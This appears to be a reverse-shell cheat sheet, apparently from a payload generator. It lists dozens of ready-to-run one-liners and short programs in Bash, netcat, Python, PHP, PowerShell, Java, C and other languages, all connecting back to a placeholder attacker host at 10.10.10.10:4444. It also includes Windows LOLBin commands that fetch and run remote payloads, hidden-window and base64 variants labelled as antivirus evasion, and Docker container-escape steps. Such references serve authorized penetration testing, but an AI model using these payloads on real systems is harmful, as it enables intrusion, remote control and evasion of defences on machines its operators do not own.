Target: 10.10.10.10:4444
72 shells
Bash
Bash -i: Classic bash reverse shell using /dev/tcp pseudo-device
LINUX OSX
bash -i >& /dev/tcp/10.10.10.10/4444 0>&1
Bash 196: Uses file descriptor 196 — good for restricted environments
LINUX OSX
0<&196;exec 196<>/dev/tcp/10.10.10.10/4444; sh <&196 >&196 2>&196
Bash Read Line: Reads commands line by line over TCP
LINUX OSX
exec 5<>/dev/tcp/10.10.10.10/4444;cat <&5 | while read line; do $line 2>&5 >&5; done
Bash FD 5: Uses file descriptor 5 bidirectionally
LINUX OSX
bash -i 5<> /dev/tcp/10.10.10.10/4444 0<&5 1>&5 2>&5
Bash UDP: UDP reverse shell — bypasses TCP-only firewalls (listener: nc -u -lvnp 4444)
LINUX OSX
sh -i >& /dev/udp/10.10.10.10/4444 0>&1
Bash 1-liner 2: Wrapped in bash -c for injection contexts
LINUX OSX
bash -c 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1'
Bash Subshell: Forks into background — shell survives parent process exit
LINUX OSX
(bash -i >& /dev/tcp/10.10.10.10/4444 0>&1) &
Zsh
Zsh: Zsh native TCP socket module
LINUX OSX
zsh -c 'zmodload zsh/net/tcp && ztcp 10.10.10.10 4444 && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'
sh
sh -i: POSIX sh variant — works when bash is unavailable
LINUX OSX
sh -i >& /dev/tcp/10.10.10.10/4444 0>&1
dash: Dash — default /bin/sh on Debian/Ubuntu
LINUX
dash -i >& /dev/tcp/10.10.10.10/4444 0>&1
ksh: KornShell reverse shell
LINUX OSX
ksh -c 'ksh -i >& /dev/tcp/10.10.10.10/4444 0>&1'
Fish: Fish shell wrapping bash /dev/tcp
LINUX OSX
fish -c 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1'
Netcat
nc mkfifo: Most compatible nc payload — uses named pipe, no -e flag needed
LINUX OSX
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.10.10 4444 >/tmp/f
nc -e /bin/sh: Classic nc -e (requires -e capable netcat: traditional/openbsd)
LINUX OSX
nc -e /bin/sh 10.10.10.10 4444
nc -e /bin/bash: Same as above but spawns bash specifically
LINUX OSX
nc -e /bin/bash 10.10.10.10 4444
nc -c sh: -c flag variant for netcat-traditional
LINUX OSX
nc -c sh 10.10.10.10 4444
nc UDP: UDP variant — needs: nc -u -lvnp 4444 on listener
LINUX OSX
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc -u 10.10.10.10 4444 >/tmp/f
Ncat
ncat: Ncat (nmap toolkit) with -e flag
LINUX OSX
ncat 10.10.10.10 4444 -e /bin/bash
ncat UDP: Ncat UDP variant
LINUX OSX
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|ncat -u 10.10.10.10 4444 >/tmp/f
ncat SSL: Encrypted SSL shell — listener: ncat --ssl -lvnp 4444
LINUX OSX
ncat --ssl 10.10.10.10 4444 -e /bin/bash
Socat
socat basic: Basic socat reverse shell
LINUX OSX
socat TCP:10.10.10.10:4444 EXEC:sh
socat TTY: Full interactive TTY — best socat shell
LINUX OSX
socat TCP:10.10.10.10:4444 EXEC:'bash -li',pty,stderr,setsid,sigint,sane
socat SSL: SSL encrypted socat shell — requires cert on listener
LINUX OSX
# Listener:
socat OPENSSL-LISTEN:4444,cert=shell.pem,cafile=shell.pem,fork STDOUT
# Target:
socat OPENSSL:10.10.10.10:4444,verify=0 EXEC:'/bin/bash -li',pty,stderr,setsid
socat UDP: UDP socat shell
LINUX OSX
socat UDP:10.10.10.10:4444 EXEC:bash,pty,stderr,setsid
Python
Python 2: Python 2 reverse shell with pty spawn
LINUX OSX WINDOWS
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.10",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty;pty.spawn("/bin/sh")'
Python 3: Python 3 reverse shell
LINUX OSX
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.10",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty;pty.spawn("/bin/sh")'
Python 3 Short: Shortest python3 variant
LINUX OSX
python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("10.10.10.10",4444));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("sh")'
Python 3 Thread: Threaded variant for unstable connections
LINUX OSX
python3 -c 'import socket,os,pty,threading;s=socket.socket();s.connect(("10.10.10.10",4444));p=pty.fork();os.execvp("bash",["bash"])if p==0 else os.dup2(s.fileno(),t)for t in[0,1,2]'
Python Windows: Python reverse shell spawning cmd.exe on Windows
WINDOWS
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.10",4444));subprocess.call(["cmd.exe"],stdin=s,stdout=s,stderr=s)'
PHP
PHP PentestMonkey: PentestMonkey classic — uses exec with fd 3
LINUX OSX
php -r '$sock=fsockopen("10.10.10.10",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
PHP proc_open: Uses proc_open for bidirectional I/O
LINUX OSX WINDOWS
php -r '$sock=fsockopen("10.10.10.10",4444);$proc=proc_open("/bin/sh -i",array(0=>$sock,1=>$sock,2=>$sock),$pipes);'
PHP shell_exec: Web-based shell_exec payload
LINUX OSX
<?php shell_exec("bash -i >& /dev/tcp/10.10.10.10/4444 0>&1");?>
PHP passthru: Uses passthru() — slightly different execution context
LINUX OSX
<?php passthru("bash -c 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1'");?>
PHP system: system() variant
LINUX OSX
<?php system("bash -c 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1'");?>
PHP backtick: Backtick operator (alias for shell_exec)
LINUX OSX
<?php $x=`bash -c 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1'`;?>
PHP popen: popen() variant
LINUX OSX
<?php $h=popen("bash -i >& /dev/tcp/10.10.10.10/4444 0>&1","r");pclose($h);?>
PHP pcntl_exec: Uses pcntl_exec — requires pcntl extension
LINUX OSX
<?php $sock=fsockopen("10.10.10.10",4444);pcntl_exec("/bin/sh",array("-i"),array(0=>$sock,1=>$sock,2=>$sock));?>
Perl
Perl Socket: Classic Perl socket reverse shell
LINUX OSX
perl -e 'use Socket;$i="10.10.10.10";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Perl No sh: Uses IO::Socket — no /bin/sh required in command
LINUX OSX
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.10.10.10:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
Perl IO::Socket: IO::Socket variant with exec
LINUX OSX
perl -MIO::Socket -e '$s=new IO::Socket::INET(PeerHost=>"10.10.10.10",PeerPort=>4444,Proto=>"tcp");STDIN->fdopen($s,r);$~->fdopen($s,w);exec{"/bin/sh"}"/bin/sh","-i"'
Ruby
Ruby TCPSocket: Ruby socket with exec sprintf
LINUX OSX
ruby -rsocket -e'f=TCPSocket.open("10.10.10.10",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Ruby No sh: Forks to background, reads commands via popen
LINUX OSX
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("10.10.10.10","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
Go
Go Linux: Go reverse shell (cross-platform)
LINUX OSX
echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","10.10.10.10:4444");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/s.go && go run /tmp/s.go
Go Windows: Go reverse shell — cmd.exe on Windows
WINDOWS
echo package main > s.go && echo import( >> s.go && echo "net" >> s.go && echo "os/exec" >> s.go && echo ) >> s.go && echo func main(){ >> s.go && echo c,_:=net.Dial("tcp","10.10.10.10:4444") >> s.go && echo cmd:=exec.Command("cmd.exe") >> s.go && echo cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()} >> s.go && go run s.go
Java
Java Runtime: Java Runtime.exec() — useful in RCE contexts
LINUX OSX
Runtime r=Runtime.getRuntime(); String[] cmd={"/bin/bash","-c","exec 5<>/dev/tcp/10.10.10.10/4444;cat <&5|while read l;do $l 2>&5>&5;done"}; Process p=r.exec(cmd);
Java Thread: Java threaded shell — compile & run
LINUX OSX WINDOWS
public class S extends Thread{public void run(){try{String[] c=new String[]{"/bin/sh","-i"};ProcessBuilder pb=new ProcessBuilder(c);pb.redirectErrorStream(true);Process p=pb.start();java.net.Socket s=new java.net.Socket("10.10.10.10",4444);java.io.InputStream is=p.getInputStream();java.io.OutputStream os=s.getOutputStream();int b;while((b=is.read())!=-1){os.write(b);os.flush();}p.waitFor();}catch(Exception e){}}} new S().start();
Java ScriptEngine: Java ScriptEngine / JNDI injection context
LINUX OSX
String[] cmd=new String[]{"/bin/bash","-c","bash -i >& /dev/tcp/10.10.10.10/4444 0>&1"}; Runtime.getRuntime().exec(cmd);
Java Groovy: Groovy one-liner (Jenkins Script Console etc.)
LINUX OSX
String cmd = "bash -i >& /dev/tcp/10.10.10.10/4444 0>&1"; ["bash","-c",cmd].execute()
Node.js
Node.js: Node.js child_process + net socket
LINUX OSX WINDOWS
(function(){var net=require("net"),cp=require("child_process"),sh=cp.spawn("/bin/sh",[]);var c=new net.Socket();c.connect(4444,"10.10.10.10",function(){c.pipe(sh.stdin);sh.stdout.pipe(c);sh.stderr.pipe(c);});return /a/;})();
Node.js Windows: Same but spawns cmd.exe on Windows
WINDOWS
(function(){var net=require("net"),cp=require("child_process"),sh=cp.spawn("cmd.exe",[]);var c=new net.Socket();c.connect(4444,"10.10.10.10",function(){c.pipe(sh.stdin);sh.stdout.pipe(c);sh.stderr.pipe(c);});return /a/;})();
Node.js Exec: Minimal Node.js — one-liner exec injection
LINUX OSX
require('child_process').exec('bash -i >& /dev/tcp/10.10.10.10/4444 0>&1');
PowerShell
PowerShell #1: Full PowerShell reverse shell with prompt
WINDOWS
powershell -nop -c "$client=New-Object System.Net.Sockets.TCPClient('10.10.10.10',4444);$stream=$client.GetStream();[byte[]]$bytes=0..65535|%{0};while(($i=$stream.Read($bytes,0,$bytes.Length))-ne 0){$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex $data 2>&1|Out-String);$sendback2=$sendback+'PS '+(pwd).Path+'> ';$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
PowerShell #2: Hidden window PowerShell — good for evasion
WINDOWS
powershell -nop -W hidden -noni -ep bypass -c "$TCPClient=New-Object Net.Sockets.TCPClient('10.10.10.10',4444);$NS=$TCPClient.GetStream();$SW=New-Object IO.StreamWriter($NS);$SW.AutoFlush=$true;$Buffer=New-Object System.Byte[] 1024;$Enc=New-Object System.Text.ASCIIEncoding;while($TCPClient.Connected){while($NS.DataAvailable){$RD=$NS.Read($Buffer,0,$Buffer.Length);$Code=$Enc.GetString($Buffer,0,$RD)};if($TCPClient.Connected -and $Code.Length -gt 1){$Output=try{Invoke-Expression($Code) 2>&1}catch{$_};$SW.Write("$Output\`n");$Code=$null}}"
PowerShell Base64: Base64 encoded PowerShell — bypasses simple AV string detection
WINDOWS
powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQAwAC4AMQAwACIALAAgADQANAA0ADQAKQA7AA==
Windows
cmd.exe nc: cmd.exe via netcat (requires nc.exe on target)
WINDOWS
cmd.exe /c nc.exe 10.10.10.10 4444 -e cmd.exe
cmd.exe certutil: Downloads nc.exe via certutil then reverses — LOLBins technique
WINDOWS
certutil -urlcache -split -f http://10.10.10.10/nc.exe C:\Windows\Temp\nc.exe && C:\Windows\Temp\nc.exe 10.10.10.10 4444 -e cmd.exe
WMIC shell: Launch via WMIC process creation — good for lateral movement
WINDOWS
wmic process call create "cmd.exe /c nc.exe 10.10.10.10 4444 -e cmd.exe"
mshta: LOLBin — host a .hta containing VBScript reverse shell
WINDOWS
mshta http://10.10.10.10/shell.hta
regsvr32: Squiblydoo — executes remote .sct scriptlet via scrobj.dll
WINDOWS
regsvr32 /s /n /u /i:http://10.10.10.10/shell.sct scrobj.dll
rundll32: LOLBin via rundll32 JScript execution
WINDOWS
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new ActiveXObject("WScript.Shell");h.run("cmd /c nc.exe 10.10.10.10 4444 -e cmd.exe");
C/C++
C Linux: Compile: gcc shell.c -o shell && ./shell
LINUX
#include <stdio.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <unistd.h>
int main(void){
  int s=socket(AF_INET,SOCK_STREAM,0);
  struct sockaddr_in sa;
  sa.sin_family=AF_INET;
  sa.sin_port=htons(4444);
  inet_aton("10.10.10.10",&sa.sin_addr);
  connect(s,(struct sockaddr*)&sa,sizeof(sa));
  dup2(s,0);dup2(s,1);dup2(s,2);
  execve("/bin/sh",NULL,NULL);
}
C++ Windows: C++ Windows shell — compile: cl shell.cpp /link ws2_32.lib
WINDOWS
#include<winsock2.h>
#include<windows.h>
#pragma comment(lib,"ws2_32")
int main(){
  WSADATA wd;
  WSAStartup(MAKEWORD(2,2),&wd);
  SOCKET s=WSASocket(AF_INET,SOCK_STREAM,0,NULL,0,0);
  SOCKADDR_IN sa;
  sa.sin_family=AF_INET;
  sa.sin_port=htons(4444);
  sa.sin_addr.s_addr=inet_addr("10.10.10.10");
  WSAConnect(s,(SOCKADDR*)&sa,sizeof(sa),0,0,0,0);
  STARTUPINFO si={0};
  si.cb=sizeof(si);si.dwFlags=STARTF_USESTDHANDLES;
  si.hStdInput=si.hStdOutput=si.hStdError=(HANDLE)s;
  PROCESS_INFORMATION pi;
  CreateProcess(NULL,"cmd.exe",NULL,NULL,TRUE,0,NULL,NULL,&si,&pi);
}
C#
C# TcpClient: C# TcpClient — compile: csc shell.cs && shell.exe
WINDOWS
using System;
using System.Net;
using System.Net.Sockets;
using System.Diagnostics;
class S{
  static void Main(){
    TcpClient c=new TcpClient("10.10.10.10",4444);
    NetworkStream s=c.GetStream();
    ProcessStartInfo pi=new ProcessStartInfo("cmd.exe");
    pi.UseShellExecute=false;
    pi.RedirectStandardInput=true;
    pi.RedirectStandardOutput=true;
    pi.RedirectStandardError=true;
    Process p=Process.Start(pi);
    p.StandardInput.BaseStream.CopyTo(s);
    s.CopyTo(p.StandardInput.BaseStream);
  }
}
Telnet
Telnet: Telnet via named pipe
LINUX OSX
TF=$(mktemp -u);mkfifo $TF && telnet 10.10.10.10 4444 0<$TF | sh 1>$TF
Telnet 2-conn: Two-connection telnet — stdin on 4444, stdout on 4445
LINUX OSX
# On attacker — start 2 listeners:
nc -lvnp 4444
nc -lvnp $((p+1))
# On target:
telnet 10.10.10.10 4444 | /bin/bash | telnet 10.10.10.10 $((p+1))
Awk
Awk: Awk native /inet/tcp support — no external tools
LINUX OSX
awk 'BEGIN {s = "/inet/tcp/0/10.10.10.10/4444"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/stdin
Lua
Lua: Lua socket library reverse shell
LINUX OSX
lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.10.10.10','4444');os.execute('/bin/sh -i <&3 >&3 2>&3');"
Lua5.1: Lua 5.1 specific
LINUX OSX
lua5.1 -e 'local s=require("socket");local t=assert(s.tcp());t:connect("10.10.10.10",4444);while true do local r,x=t:receive();local f=assert(io.popen(r,"r"));local b=assert(f:read("*a"));t:send(b);end;f:close();t:close();'
Tcl
Tcl: Tcl event-driven socket shell
LINUX OSX
echo 'set s [socket 10.10.10.10 4444];fconfigure $s -translation binary -buffering full;set p [open "|bash -i" r+];fconfigure $p -translation binary -buffering full;fileevent $s readable {puts -nonewline $p [read $s];flush $p};fileevent $p readable {puts -nonewline $s [read $p];flush $s};vwait _' | tclsh
OpenSSL
OpenSSL: Encrypted reverse shell — traffic looks like TLS
LINUX OSX
# --- ATTACKER (run these first) ---
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes -subj "/CN=localhost"
openssl s_server -quiet -key key.pem -cert cert.pem -port 4444
# --- TARGET ---
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 10.10.10.10:4444 > /tmp/s; rm /tmp/s
Docker
Docker breakout: Docker socket privilege escalation → host reverse shell
LINUX
# If you have access to the Docker socket:
docker run -it --rm --privileged -v /:/hostfs alpine chroot /hostfs /bin/bash -c 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1'
Docker cgroup: Container escape via cgroup release_agent (privileged containers)
LINUX
# Container escape via cgroup release_agent:
mkdir /tmp/cg && mount -t cgroup -o rdma cgroup /tmp/cg
mkdir /tmp/cg/x
echo 1 > /tmp/cg/x/notify_on_release
host_path=\`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab\`
echo "$host_path/cmd" > /tmp/cg/release_agent
echo '#!/bin/sh' > /cmd
echo "bash -i >& /dev/tcp/10.10.10.10/4444 0>&1" >> /cmd
chmod a+x /cmd
sh -c "echo \$\$ > /tmp/cg/x/cgroup.procs"